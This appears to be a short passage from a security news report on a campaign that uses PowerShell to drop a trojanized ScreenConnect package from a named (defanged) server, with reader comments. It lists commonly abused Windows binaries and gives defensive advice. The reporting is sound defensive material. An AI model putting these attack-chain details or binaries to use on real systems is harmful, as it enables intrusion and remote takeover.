The embedded PowerShell code creates a hidden folder at C:\Systems and downloads a trojanized ScreenConnect package from legitserver.theworkpc[.]com over TCP port 5443.
Nothing to see here, just a legit server doing work with the systems.
URL appears to be dead. Tried to pull a copy of that zip file, just times out.
You wouldn’t download a weaponized jpeg
Security teams are advised to block or closely monitor execution of commonly abused Windows binaries including csc.exe, cvtres.exe, and ComputerDefaults.exe. Organizations should enforce strict controls over remote access platforms, deploy detection rules for suspicious PowerShell behavior, and isolate any system showing unexpected ScreenConnect activity. Credential resets for all privileged accounts are strongly recommended following any suspected exposure.
So all windows users without a “security team” are vulnerable to this extremely simple & powerful attack for the foreseeable future???